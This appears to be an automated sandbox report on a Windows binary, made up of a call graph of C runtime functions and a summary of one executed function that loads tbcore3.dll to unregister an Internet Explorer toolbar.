3751->3283 3753 6c3808 3752->3753 3754 6c1dd3 3753->3754 3755 6c382f __VEC_memcpy 3753->3755 3754->3302 3755->3754 3757 6c368d 3756->3757 3758 6c3694 3756->3758 3757->3758 3763 6c36c0 3757->3763 3759 6c2c72 __calloc_impl 66 API calls 3758->3759 3760 6c3699 3759->3760 3761 6c2c0a __calloc_impl 6 API calls 3760->3761 3762 6c36a8 3761->3762 3762->3321 3763->3762 3764 6c2c72 __calloc_impl 66 API calls 3763->3764 3764->3760 3767 6c2dc9 3765->3767 3766 6c207e __encode_pointer 6 API calls 3766->3767 3767->3766 3768 6c2de1 3767->3768 3768->3327 3772 6c2d70 3769->3772 3771 6c2db9 3771->3329 3773 6c2d7c __calloc_impl 3772->3773 3780 6c147d 3773->3780 3779 6c2d9d __calloc_impl 3779->3771 3781 6c2aa0 __lock 66 API calls 3780->3781 3782 6c1484 3781->3782 3783 6c2c85 3782->3783 3784 6c20f9 __decode_pointer 6 API calls 3783->3784 3785 6c2c99 3784->3785 3786 6c20f9 __decode_pointer 6 API calls 3785->3786 3788 6c2ca9 3786->3788 3787 6c2d2c 3800 6c2da6 3787->3800 3788->3787 3803 6c539a 3788->3803 3790 6c2d13 3791 6c207e __encode_pointer 6 API calls 3790->3791 3792 6c2d21 3791->3792 3795 6c207e __encode_pointer 6 API calls 3792->3795 3793 6c2ceb 3793->3787 3797 6c377c __realloc_crt 73 API calls 3793->3797 3798 6c2d01 3793->3798 3794 6c2cc7 3794->3790 3794->3793 3816 6c377c 3794->3816 3795->3787 3797->3798 3798->3787 3799 6c207e __encode_pointer 6 API calls 3798->3799 3799->3790 3866 6c1486 3800->3866 3804 6c53a6 __calloc_impl 3803->3804 3805 6c53b6 3804->3805 3806 6c53d3 3804->3806 3807 6c2c72 __calloc_impl 66 API calls 3805->3807 3808 6c5414 HeapSize 3806->3808 3809 6c2aa0 __lock 66 API calls 3806->3809 3810 6c53bb 3807->3810 3812 6c53cb __calloc_impl 3808->3812 3813 6c53e3 ___sbh_find_block 3809->3813 3811 6c2c0a __calloc_impl 6 API calls 3810->3811 3811->3812 3812->3794 3821 6c5434 3813->3821 3817 6c3785 3816->3817 3819 6c37c4 3817->3819 3820 6c37a5 Sleep 3817->3820 3825 6c569d 3817->3825 3819->3793 3820->3817 3824 6c29c6 LeaveCriticalSection 3821->3824 3823 6c540f 3823->3808 3823->3812 3824->3823 3826 6c56a9 __calloc_impl 3825->3826 3827 6c56be 3826->3827 3828 6c56b0 3826->3828 3830 6c56c5 3827->3830 3831 6c56d1 3827->3831 3829 6c54b5 _malloc 66 API calls 3828->3829 3847 6c56b8 _realloc __calloc_impl 3829->3847 3832 6c35ee ___free_lconv_num 66 API calls 3830->3832 3837 6c5843 3831->3837 3861 6c56de ___sbh_resize_block ___sbh_find_block 3831->3861 3832->3847 3833 6c5876 3836 6c31eb __calloc_impl 6 API calls 3833->3836 3834 6c5848 HeapReAlloc 3834->3837 3834->3847 3835 6c2aa0 __lock 66 API calls 3835->3861 3838 6c587c 3836->3838 3837->3833 3837->3834 3839 6c589a 3837->3839 3841 6c31eb __calloc_impl 6 API calls 3837->3841 3844 6c5890 3837->3844 3840 6c2c72 __calloc_impl 66 API calls 3838->3840 3842 6c2c72 __calloc_impl 66 API calls 3839->3842 3839->3847 3840->3847 3841->3837 3843 6c58a3 GetLastError 3842->3843 3843->3847 3846 6c2c72 __calloc_impl 66 API calls 3844->3846 3849 6c5811 3846->3849 3847->3817 3848 6c5769 HeapAlloc 3848->3861 3849->3847 3851 6c5816 GetLastError 3849->3851 3850 6c57be HeapReAlloc 3850->3861 3851->3847 3852 6c4dc3 ___sbh_alloc_block 5 API calls 3852->3861 3853 6c5829 3853->3847 3855 6c2c72 __calloc_impl 66 API calls 3853->3855 3854 6c31eb __calloc_impl 6 API calls 3854->3861 3857 6c5836 3855->3857 3856 6c4614 VirtualFree VirtualFree HeapFree ___sbh_free_block 3856->3861 3857->3843 3857->3847 3858 6c580c 3860 6c2c72 __calloc_impl 66 API calls 3858->3860 3859 6c37f0 __VEC_memcpy _realloc 3859->3861 3860->3849 3861->3833 3861->3835 3861->3847 3861->3848 3861->3850 3861->3852 3861->3853 3861->3854 3861->3856 3861->3858 3861->3859 3862 6c57e1 3861->3862 3865 6c29c6 LeaveCriticalSection 3862->3865 3864 6c57e8 3864->3861 3865->3864 3869 6c29c6 LeaveCriticalSection 3866->3869 3868 6c148d 3868->3779 3869->3868 3871 6c1561 __calloc_impl 3870->3871 3872 6c2aa0 __lock 66 API calls 3871->3872 3873 6c1568 3872->3873 3874 6c1631 __initterm 3873->3874 3875 6c1594 3873->3875 3889 6c166c 3874->3889 3877 6c20f9 __decode_pointer 6 API calls 3875->3877 3879 6c159f 3877->3879 3881 6c1621 __initterm 3879->3881 3883 6c20f9 __decode_pointer 6 API calls 3879->3883 3880 6c1669 __calloc_impl 3880->3346 3881->3874 3887 6c15b4 3883->3887 3884 6c1660 3885 6c1465 _fast_error_exit 3 API calls 3884->3885 3885->3880 3886 6c20f0 6 API calls ___crtMessageBoxW 3886->3887 3887->3881 3887->3886 3888 6c20f9 6 API calls __decode_pointer 3887->3888 3888->3887 3890 6c164d 3889->3890 3891 6c1672 3889->3891 3890->3880 3893 6c29c6 LeaveCriticalSection 3890->3893 3894 6c29c6 LeaveCriticalSection 3891->3894 3893->3884 3894->3890 3948 6c4247 3958 6c41cb 3948->3958 3951 6c4272 setSBCS 3952 6c10cc ___ansicp 5 API calls 3951->3952 3954 6c442a 3952->3954 3953 6c42b6 IsValidCodePage 3953->3951 3955 6c42c8 GetCPInfo 3953->3955 3955->3951 3957 6c42db __calloc_impl __setmbcp_nolock 3955->3957 3965 6c3f0d GetCPInfo 3957->3965 3975 6c4144 3958->3975 3961 6c4208 3963 6c420d GetACP 3961->3963 3964 6c41fa 3961->3964 3962 6c41ea GetOEMCP 3962->3964 3963->3964 3964->3951 3964->3953 3964->3957 3968 6c3f41 __calloc_impl 3965->3968 3974 6c3ff3 3965->3974 4191 6c5fe2 3968->4191 3970 6c10cc ___ansicp 5 API calls 3972 6c409e 3970->3972 3972->3957 3973 6c6415 ___crtLCMapStringA 101 API calls 3973->3974 3974->3970 3976 6c4157 3975->3976 3978 6c41a4 3975->3978 3983 6c2345 3976->3983 3978->3961 3978->3962 3979 6c4184 3979->3978 4003 6c40a0 3979->4003 3984 6c22cc __getptd_noexit 66 API calls 3983->3984 3985 6c234d 3984->3985 3986 6c235a 3985->3986 3987 6c1411 __amsg_exit 66 API calls 3985->3987 3986->3979 3988 6c3e04 3986->3988 3987->3986 3989 6c3e10 __calloc_impl 3988->3989 3990 6c2345 __getptd 66 API calls 3989->3990 3991 6c3e15 3990->3991 3992 6c3e43 3991->3992 3993 6c3e27 3991->3993 3994 6c2aa0 __lock 66 API calls 3992->3994 3995 6c2345 __getptd 66 API calls 3993->3995 3996 6c3e4a 3994->3996 3997 6c3e2c 3995->3997 4019 6c3dc6 3996->4019 4001 6c3e3a __calloc_impl 3997->4001 4002 6c1411 __amsg_exit 66 API calls 3997->4002 4001->3979 4002->4001 4004 6c40ac __calloc_impl 4003->4004 4005 6c2345 __getptd 66 API calls 4004->4005 4006 6c40b1 4005->4006 4007 6c2aa0 __lock 66 API calls 4006->4007 4008 6c40c3 4006->4008 4009 6c40e1 4007->4009 4011 6c40d1 __calloc_impl 4008->4011 4015 6c1411 __amsg_exit 66 API calls 4008->4015 4010 6c412a 4009->4010 4012 6c40f8 InterlockedDecrement 4009->4012 4013 6c4112 InterlockedIncrement 4009->4013 4187 6c413b 4010->4187 4011->3978 4012->4013 4016 6c4103 4012->4016 4013->4010 4015->4011 4016->4013 4017 6c35ee ___free_lconv_num 66 API calls 4016->4017 4018 6c4111 4017->4018 4018->4013 4020 6c3dca 4019->4020 4021 6c3dfc 4019->4021 4020->4021 4022 6c3c9e ___addlocaleref 8 API calls 4020->4022 4027 6c3e6e 4021->4027 4023 6c3ddd 4022->4023 4023->4021 4030 6c3d2d 4023->4030 4186 6c29c6 LeaveCriticalSection 4027->4186 4029 6c3e75 4029->3997 4031 6c3d3e InterlockedDecrement 4030->4031 4032 6c3dc1 4030->4032 4033 6c3d56 4031->4033 4034 6c3d53 InterlockedDecrement 4031->4034 4032->4021 4044 6c3b55 4032->4044 4035 6c3d60 InterlockedDecrement 4033->4035 4036 6c3d63 4033->4036 4034->4033 4035->4036 4037 6c3d6d InterlockedDecrement 4036->4037 4038 6c3d70 4036->4038 4037->4038 4039 6c3d7a InterlockedDecrement 4038->4039 4041 6c3d7d 4038->4041 4039->4041 4040 6c3d96 InterlockedDecrement 4040->4041 4041->4040 4042 6c3da6 InterlockedDecrement 4041->4042 4043 6c3db1 InterlockedDecrement 4041->4043 4042->4041 4043->4032 4045 6c3bd9 4044->4045 4052 6c3b6c 4044->4052 4046 6c35ee ___free_lconv_num 66 API calls 4045->4046 4047 6c3c26 4045->4047 4048 6c3bfa 4046->4048 4057 6c3c4d 4047->4057 4098 6c5ae1 4047->4098 4050 6c35ee ___free_lconv_num 66 API calls 4048->4050 4056 6c3c0d 4050->4056 4052->4045 4055 6c35ee ___free_lconv_num 66 API calls 4052->4055 4070 6c3ba0 4052->4070 4053 6c3c92 4059 6c35ee ___free_lconv_num 66 API calls 4053->4059 4054 6c35ee ___free_lconv_num 66 API calls 4054->4057 4060 6c3b95 4055->4060 4061 6c35ee ___free_lconv_num 66 API calls 4056->4061 4057->4053 4068 6c35ee 66 API calls ___free_lconv_num 4057->4068 4058 6c35ee ___free_lconv_num 66 API calls 4063 6c3bce 4058->4063 4064 6c3c98 4059->4064 4074 6c5cbb 4060->4074 4066 6c3c1b 4061->4066 4062 6c35ee ___free_lconv_num 66 API calls 4067 6c3bb6 4062->4067 4069 6c35ee ___free_lconv_num 66 API calls 4063->4069 4064->4021 4071 6c35ee ___free_lconv_num 66 API calls 4066->4071 4090 6c5c76 4067->4090 4068->4057 4069->4045 4070->4062 4073 6c3bc1 4070->4073 4071->4047 4073->4058 4075 6c5cc8 4074->4075 4089 6c5d45 4074->4089 4076 6c5cd9 4075->4076 4078 6c35ee ___free_lconv_num 66 API calls 4075->4078 4077 6c5ceb 4076->4077 4079 6c35ee ___free_lconv_num 66 API calls 4076->4079 4080 6c5cfd 4077->4080 4081 6c35ee ___free_lconv_num 66 API calls 4077->4081 4078->4076 4079->4077 4082 6c35ee ___free_lconv_num 66 API calls 4080->4082 4083 6c5d0f 4080->4083 4081->4080 4082->4083 4084 6c35ee ___free_lconv_num 66 API calls 4083->4084 4085 6c5d21 4083->4085 4084->4085 4086 6c35ee ___free_lconv_num 66 API calls 4085->4086 4087 6c5d33 4085->4087 4086->4087 4088 6c35ee ___free_lconv_num 66 API calls 4087->4088 4087->4089 4088->4089 4089->4070 4091 6c5c83 4090->4091 4097 6c5cb7 4090->4097 4092 6c35ee ___free_lconv_num 66 API calls 4091->4092 4095 6c5c93 4091->4095 4092->4095 4093 6c35ee ___free_lconv_num 66 API calls 4094 6c5ca5 4093->4094 4096 6c35ee ___free_lconv_num 66 API calls 4094->4096 4094->4097 4095->4093 4095->4094 4096->4097 4097->4073 4099 6c5af2 4098->4099 4185 6c3c46 4098->4185 4100 6c35ee ___free_lconv_num 66 API calls 4099->4100 4101 6c5afa 4100->4101 4102 6c35ee ___free_lconv_num 66 API calls 4101->4102 4103 6c5b02 4102->4103 4104 6c35ee ___free_lconv_num 66 API calls 4103->4104 4105 6c5b0a 4104->4105 4106 6c35ee ___free_lconv_num 66 API calls 4105->4106 4107 6c5b12 4106->4107 4108 6c35ee ___free_lconv_num 66 API calls 4107->4108 4109 6c5b1a 4108->4109 4110 6c35ee ___free_lconv_num 66 API calls 4109->4110 4111 6c5b22 4110->4111 4112 6c35ee ___free_lconv_num 66 API calls 4111->4112 4113 6c5b29 4112->4113 4114 6c35ee ___free_lconv_num 66 API calls 4113->4114 4115 6c5b31 4114->4115 4116 6c35ee ___free_lconv_num 66 API calls 4115->4116 4117 6c5b39 4116->4117 4118 6c35ee ___free_lconv_num 66 API calls 4117->4118 4119 6c5b41 4118->4119 4120 6c35ee ___free_lconv_num 66 API calls 4119->4120 4121 6c5b49 4120->4121 4122 6c35ee ___free_lconv_num 66 API calls 4121->4122 4123 6c5b51 4122->4123 4124 6c35ee ___free_lconv_num 66 API calls 4123->4124 4125 6c5b59 4124->4125 4126 6c35ee ___free_lconv_num 66 API calls 4125->4126 4127 6c5b61 4126->4127 4128 6c35ee ___free_lconv_num 66 API calls 4127->4128 4129 6c5b69 4128->4129 4130 6c35ee ___free_lconv_num 66 API calls 4129->4130 4131 6c5b71 4130->4131 4132 6c35ee ___free_lconv_num 66 API calls 4131->4132 4133 6c5b7c 4132->4133 4134 6c35ee ___free_lconv_num 66 API calls 4133->4134 4135 6c5b84 4134->4135 4136 6c35ee ___free_lconv_num 66 API calls 4135->4136 4137 6c5b8c 4136->4137 4138 6c35ee ___free_lconv_num 66 API calls 4137->4138 4139 6c5b94 4138->4139 4140 6c35ee ___free_lconv_num 66 API calls 4139->4140 4141 6c5b9c 4140->4141 4142 6c35ee ___free_lconv_num 66 API calls 4141->4142 4143 6c5ba4 4142->4143 4144 6c35ee ___free_lconv_num 66 API calls 4143->4144 4145 6c5bac 4144->4145 4146 6c35ee ___free_lconv_num 66 API calls 4145->4146 4147 6c5bb4 4146->4147 4148 6c35ee ___free_lconv_num 66 API calls 4147->4148 4149 6c5bbc 4148->4149 4150 6c35ee ___free_lconv_num 66 API calls 4149->4150 4151 6c5bc4 4150->4151 4152 6c35ee ___free_lconv_num 66 API calls 4151->4152 4153 6c5bcc 4152->4153 4154 6c35ee ___free_lconv_num 66 API calls 4153->4154 4155 6c5bd4 4154->4155 4156 6c35ee ___free_lconv_num 66 API calls 4155->4156 4157 6c5bdc 4156->4157 4158 6c35ee ___free_lconv_num 66 API calls 4157->4158 4159 6c5be4 4158->4159 4160 6c35ee ___free_lconv_num 66 API calls 4159->4160 4161 6c5bec 4160->4161 4162 6c35ee ___free_lconv_num 66 API calls 4161->4162 4163 6c5bf4 4162->4163 4164 6c35ee ___free_lconv_num 66 API calls 4163->4164 4165 6c5c02 4164->4165 4166 6c35ee ___free_lconv_num 66 API calls 4165->4166 4167 6c5c0d 4166->4167 4168 6c35ee ___free_lconv_num 66 API calls 4167->4168 4169 6c5c18 4168->4169 4170 6c35ee ___free_lconv_num 66 API calls 4169->4170 4171 6c5c23 4170->4171 4172 6c35ee ___free_lconv_num 66 API calls 4171->4172 4173 6c5c2e 4172->4173 4174 6c35ee ___free_lconv_num 66 API calls 4173->4174 4175 6c5c39 4174->4175 4176 6c35ee ___free_lconv_num 66 API calls 4175->4176 4177 6c5c44 4176->4177 4178 6c35ee ___free_lconv_num 66 API calls 4177->4178 4179 6c5c4f 4178->4179 4180 6c35ee ___free_lconv_num 66 API calls 4179->4180 4181 6c5c5a 4180->4181 4182 6c35ee ___free_lconv_num 66 API calls 4181->4182 4183 6c5c65 4182->4183 4184 6c35ee ___free_lconv_num 66 API calls 4183->4184 4184->4185 4185->4054 4186->4029 4190 6c29c6 LeaveCriticalSection 4187->4190 4189 6c4142 4189->4008 4190->4189 4192 6c4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4191->4192 4193 6c5ff5 4192->4193 4201 6c5e28 4193->4201 4196 6c6415 4197 6c4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4196->4197 4198 6c6428 4197->4198 4289 6c6070 4198->4289 4202 6c5e49 GetStringTypeW 4201->4202 4203 6c5e74 4201->4203 4204 6c5e69 GetLastError 4202->4204 4205 6c5e61 4202->4205 4203->4205 4206 6c5f5b 4203->4206 4204->4203 4207 6c5ead MultiByteToWideChar 4205->4207 4216 6c5f55 4205->4216 4229 6c6b1a GetLocaleInfoA 4206->4229 4211 6c5eda 4207->4211 4207->4216 4209 6c10cc ___ansicp 5 API calls 4212 6c3fae 4209->4212 4218 6c54b5 _malloc 66 API calls 4211->4218 4223 6c5eef __alloca_probe_16 __calloc_impl 4211->4223 4212->4196 4213 6c5fac GetStringTypeA 4213->4216 4217 6c5fc7 4213->4217 4215 6c5f28 MultiByteToWideChar 4220 6c5f3e GetStringTypeW 4215->4220 4221 6c5f4f 4215->4221 4216->4209 4222 6c35ee ___free_lconv_num 66 API calls 4217->4222 4218->4223 4220->4221 4225 6c5446 4221->4225 4222->4216 4223->4215 4223->4216 4226 6c5463 4225->4226 4227 6c5452 4225->4227 4226->4216 4227->4226 4228 6c35ee ___free_lconv_num 66 API calls 4227->4228 4228->4226 4230 6c6b4d 4229->4230 4231 6c6b48 4229->4231 4260 6c6b04 4230->4260 4233 6c10cc ___ansicp 5 API calls 4231->4233 4234 6c5f7f 4233->4234 4234->4213 4234->4216 4235 6c6b63 4234->4235 4236 6c6c2d 4235->4236 4237 6c6ba3 GetCPInfo 4235->4237 4240 6c10cc ___ansicp 5 API calls 4236->4240 4238 6c6c18 MultiByteToWideChar 4237->4238 4239 6c6bba 4237->4239 4238->4236 4244 6c6bd3 _strlen 4238->4244 4239->4238 4241 6c6bc0 GetCPInfo 4239->4241 4242 6c5fa0 4240->4242 4241->4238 4243 6c6bcd 4241->4243 4242->4213 4242->4216 4243->4238 4243->4244 4245 6c54b5 _malloc 66 API calls 4244->4245 4247 6c6c05 __alloca_probe_16 __calloc_impl 4244->4247 4245->4247 4246 6c6c62 MultiByteToWideChar 4248 6c6c7a 4246->4248 4257 6c6c99 4246->4257 4247->4236 4247->4246 4250 6c6c9e 4248->4250 4251 6c6c81 WideCharToMultiByte 4248->4251 4249 6c5446 __freea 66 API calls 4249->4236 4252 6c6cbd 4250->4252 4253 6c6ca9 WideCharToMultiByte 4250->4253 4251->4257 4254 6c3730 __calloc_crt 66 API calls 4252->4254 4253->4252 4253->4257 4255 6c6cc5 4254->4255 4256 6c6cce WideCharToMultiByte 4255->4256 4255->4257 4256->4257 4258 6c6ce0 4256->4258 4257->4249 4259 6c35ee ___free_lconv_num 66 API calls 4258->4259 4259->4257 4263 6c6f7a 4260->4263 4264 6c6f93 4263->4264 4267 6c6d4b 4264->4267 4268 6c4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4267->4268 4270 6c6d60 4268->4270 4269 6c6d72 4271 6c2c72 __calloc_impl 66 API calls 4269->4271 4270->4269 4275 6c6daf 4270->4275 4272 6c6d77 4271->4272 4273 6c2c0a __calloc_impl 6 API calls 4272->4273 4276 6c6b15 4273->4276 4277 6c6df4 4275->4277 4279 6c69e5 4275->4279 4276->4231 4277->4276 4278 6c2c72 __calloc_impl 66 API calls 4277->4278 4278->4276 4280 6c4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4279->4280 4281 6c69f9 4280->4281 4282 6c6a06 4281->4282 4286 6c6acc 4281->4286 4282->4275 4285 6c5fe2 ___crtGetStringTypeA 90 API calls 4285->4282 4287 6c4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4286->4287 4288 6c6a2e 4287->4288 4288->4285 4290 6c6091 LCMapStringW 4289->4290 4293 6c60ac 4289->4293 4291 6c60b4 GetLastError 4290->4291 4290->4293 4291->4293 4292 6c62aa 4296 6c6b1a ___ansicp 90 API calls 4292->4296 4293->4292 4294 6c6106 4293->4294 4295 6c611f MultiByteToWideChar 4294->4295 4319 6c62a1 4294->4319 4304 6c614c 4295->4304 4295->4319 4297 6c62d2 4296->4297 4300 6c62eb 4297->4300 4301 6c63c6 LCMapStringA 4297->4301 4297->4319 4298 6c10cc ___ansicp 5 API calls 4299 6c3fce 4298->4299 4299->3973 4302 6c6b63 ___convertcp 73 API calls 4300->4302 4335 6c6322 4301->4335 4307 6c62fd 4302->4307 4303 6c619d MultiByteToWideChar 4308 6c61b6 LCMapStringW 4303->4308 4330 6c6298 4303->4330 4306 6c54b5 _malloc 66 API calls 4304->4306 4313 6c6165 __alloca_probe_16 4304->4313 4305 6c63ed 4316 6c35ee ___free_lconv_num 66 API calls 4305->4316 4305->4319 4306->4313 4310 6c6307 LCMapStringA 4307->4310 4307->4319 4312 6c61d7 4308->4312 4308->4330 4309 6c35ee ___free_lconv_num 66 API calls 4309->4305 4321 6c6329 4310->4321 4310->4335 4311 6c5446 __freea 66 API calls 4311->4319 4314 6c61e0 4312->4314 4320 6c6209 4312->4320 4313->4303 4313->4319 4318 6c61f2 LCMapStringW 4314->4318 4314->4330 4315 6c6224 __alloca_probe_16 4322 6c6258 LCMapStringW 4315->4322 4315->4330 4316->4319 4317 6c633a __alloca_probe_16 __calloc_impl 4328 6c6378 LCMapStringA 4317->4328 4317->4335 4318->4330 4319->4298 4320->4315 4326 6c54b5 _malloc 66 API calls 4320->4326 4321->4317 4323 6c54b5 _malloc 66 API calls 4321->4323 4324 6c6270 WideCharToMultiByte 4322->4324 4325 6c6292 4322->4325 4323->4317 4324->4325 4327 6c5446 __freea 66 API calls 4325->4327 4326->4315 4327->4330 4331 6c6398 4328->4331 4332 6c6394 4328->4332 4330->4311 4333 6c6b63 ___convertcp 73 API calls 4331->4333 4334 6c5446 __freea 66 API calls 4332->4334 4333->4332 4334->4335 4335->4305 4335->4309 4431 6c1281 4434 6c283c 4431->4434 4433 6c1286 4433->4433 4435 6c286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 4434->4435 4436 6c2861 4434->4436 4437 6c2865 4435->4437 4436->4435 4436->4437 4437->4433 4336 6c1242 4337 6c1257 4336->4337 4338 6c1251 4336->4338 4342 6c16bc 4337->4342 4340 6c1697 _raise 66 API calls 4338->4340 4340->4337 4341 6c125c __calloc_impl 4343 6c1555 _doexit 66 API calls 4342->4343 4344 6c16c7 4343->4344 4344->4341 4395 6c543d 4396 6c1411 __amsg_exit 66 API calls 4395->4396 4397 6c5444 4396->4397 3899 6c28fe 3900 6c2901 3899->3900 3903 6c51fb 3900->3903 3904 6c521a 3903->3904 3905 6c5221 3903->3905 3906 6c1719 __NMSG_WRITE 66 API calls 3904->3906 3915 6c2f92 3905->3915 3906->3905 3909 6c5232 __calloc_impl 3911 6c530a 3909->3911 3914 6c52ca SetUnhandledExceptionFilter UnhandledExceptionFilter 3909->3914 3939 6c1697 3911->3939 3914->3911 3916 6c20f9 __decode_pointer 6 API calls 3915->3916 3917 6c2f9d 3916->3917 3917->3909 3918 6c2f9f 3917->3918 3921 6c2fab __calloc_impl 3918->3921 3919 6c3007 3920 6c2fe8 3919->3920 3925 6c3016 3919->3925 3924 6c20f9 __decode_pointer 6 API calls 3920->3924 3921->3919 3921->3920 3922 6c2fd2 3921->3922 3928 6c2fce 3921->3928 3923 6c22cc __getptd_noexit 66 API calls 3922->3923 3926 6c2fd7 _siglookup 3923->3926 3924->3926 3927 6c2c72 __calloc_impl 66 API calls 3925->3927 3930 6c307d 3926->3930 3932 6c1697 _raise 66 API calls 3926->3932 3938 6c2fe0 __calloc_impl 3926->3938 3929 6c301b 3927->3929 3928->3922 3928->3925 3931 6c2c0a __calloc_impl 6 API calls 3929->3931 3933 6c2aa0 __lock 66 API calls 3930->3933 3935 6c3088 3930->3935 3931->3938 3932->3930 3933->3935 3934 6c20f0 ___crtMessageBoxW 6 API calls 3936 6c30bd 3934->3936 3935->3934 3935->3936 3942 6c3113 3936->3942 3938->3909 3940 6c1555 _doexit 66 API calls 3939->3940 3941 6c16a8 3940->3941 3943 6c3119 3942->3943 3944 6c3120 3942->3944 3946 6c29c6 LeaveCriticalSection 3943->3946 3944->3938 3946->3944 4345 6c235f 4346 6c236b __calloc_impl 4345->4346 4347 6c2383 4346->4347 4348 6c246d __calloc_impl 4346->4348 4349 6c35ee ___free_lconv_num 66 API calls 4346->4349 4350 6c35ee ___free_lconv_num 66 API calls 4347->4350 4353 6c2391 4347->4353 4349->4347 4350->4353 4351 6c239f 4352 6c23ad 4351->4352 4355 6c35ee ___free_lconv_num 66 API calls 4351->4355 4356 6c23bb 4352->4356 4357 6c35ee ___free_lconv_num 66 API calls 4352->4357 4353->4351 4354 6c35ee ___free_lconv_num 66 API calls 4353->4354 4354->4351 4355->4352 4358 6c23c9 4356->4358 4359 6c35ee ___free_lconv_num 66 API calls 4356->4359 4357->4356 4360 6c23d7 4358->4360 4362 6c35ee ___free_lconv_num 66 API calls 4358->4362 4359->4358 4361 6c23e8 4360->4361 4363 6c35ee ___free_lconv_num 66 API calls 4360->4363 4364 6c2aa0 __lock 66 API calls 4361->4364 4362->4360 4363->4361 4365 6c23f0 4364->4365 4366 6c23fc InterlockedDecrement 4365->4366 4367 6c2415 4365->4367 4366->4367 4368 6c2407 4366->4368 4381 6c2479 4367->4381 4368->4367 4372 6c35ee ___free_lconv_num 66 API calls 4368->4372 4371 6c2aa0 __lock 66 API calls 4373 6c2429 4371->4373 4372->4367 4374 6c245a 4373->4374 4375 6c3d2d ___removelocaleref 8 API calls 4373->4375 4384 6c2485 4374->4384 4379 6c243e 4375->4379 4378 6c35ee ___free_lconv_num 66 API calls 4378->4348 4379->4374 4380 6c3b55 ___freetlocinfo 66 API calls 4379->4380 4380->4374 4387 6c29c6 LeaveCriticalSection 4381->4387 4383 6c2422 4383->4371 4388 6c29c6 LeaveCriticalSection 4384->4388 4386 6c2467 4386->4378 4387->4383 4388->4386 4398 6c2d3f 4399 6c3730 __calloc_crt 66 API calls 4398->4399 4400 6c2d4b 4399->4400 4401 6c207e __encode_pointer 6 API calls 4400->4401 4402 6c2d53 4401->4402 4403 6c5138 4404 6c5158 @_EH4_CallFilterFunc@8 4403->4404 4405 6c514a 4403->4405 4406 6c10cc ___ansicp 5 API calls 4405->4406 4406->4404 4407 6c31b4 4408 6c31c0 SetLastError 4407->4408 4409 6c31c8 __calloc_impl 4407->4409 4408->4409 4410 6c26b0 4411 6c26dc 4410->4411 4412 6c26e9 4410->4412 4413 6c10cc ___ansicp 5 API calls 4411->4413 4414 6c10cc ___ansicp 5 API calls 4412->4414 4413->4412 4415 6c26f9 __except_handler4 __IsNonwritableInCurrentImage 4414->4415 4416 6c277c 4415->4416 4417 6c2752 __except_handler4 4415->4417 4426 6c51ca RtlUnwind 4415->4426 4417->4416 4418 6c276c 4417->4418 4419 6c10cc ___ansicp 5 API calls 4417->4419 4420 6c10cc ___ansicp 5 API calls 4418->4420 4419->4418 4420->4416 4422 6c27cb __except_handler4 4423 6c27ff 4422->4423 4424 6c10cc ___ansicp 5 API calls 4422->4424 4425 6c10cc ___ansicp 5 API calls 4423->4425 4424->4423 4425->4417 4426->4422 4438 6c1391 4439 6c13cd 4438->4439 4440 6c13a3 4438->4440 4440->4439 4442 6c28da 4440->4442 4443 6c28e6 __calloc_impl 4442->4443 4444 6c2345 __getptd 66 API calls 4443->4444 4445 6c28eb 4444->4445 4446 6c51fb _abort 68 API calls 4445->4446 4447 6c290d __calloc_impl 4446->4447 4447->4439

                                                                                        Executed Functions

                                                                                        Function 006C1000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73libraryloadersynchronizationCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 006C1006
                                                                                        • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 006C1013
                                                                                        • GetLastError.KERNEL32 ref: 006C101F
                                                                                        • GetCommandLineW.KERNEL32(?), ref: 006C1040
                                                                                        • CommandLineToArgvW.SHELL32(00000000), ref: 006C1047
                                                                                        • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 006C1061
                                                                                        • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 006C1073
                                                                                        • LoadLibraryW.KERNELBASE(?), ref: 006C1085
                                                                                        • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 006C1097
                                                                                        • FreeLibrary.KERNELBASE(00000000), ref: 006C10A4
                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 006C10AB
                                                                                        • CoUninitialize.COMBASE ref: 006C10B1
                                                                                        • LocalFree.KERNEL32(00000000), ref: 006C10BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000002A.00000002.3251666953.00000000006C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 006C0000, based on PE: true
                                                                                        • Associated: 0000002A.00000002.3251627784.00000000006C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251689620.00000000006C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251709708.00000000006CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251729622.00000000006CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_42_2_6c0000_pw8XjN.jbxd
                                                                                        Similarity
                                                                                        • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                                                        • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
                                                                                        • API String ID: 474438367-4110843154
                                                                                        • Opcode ID: 3fe024c67119d168cf5ea4c8693ce9a1a321ccd5eb6bbd67cc7360c1c4513c5f
                                                                                        • Instruction ID: b6a21c1e36729826d4a1cca2a3fbe944a6e56e379a3a3acee61a2fe5572bf872
                                                                                        • Opcode Fuzzy Hash: 3fe024c67119d168cf5ea4c8693ce9a1a321ccd5eb6bbd67cc7360c1c4513c5f
                                                                                        • Instruction Fuzzy Hash: C911DC327052A5EF8330AB60AC0CFBB379BEA47762B05052DF546D7151CF24C9468BB2
                                                                                        Function 006C1465 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                        Download Yara Rule

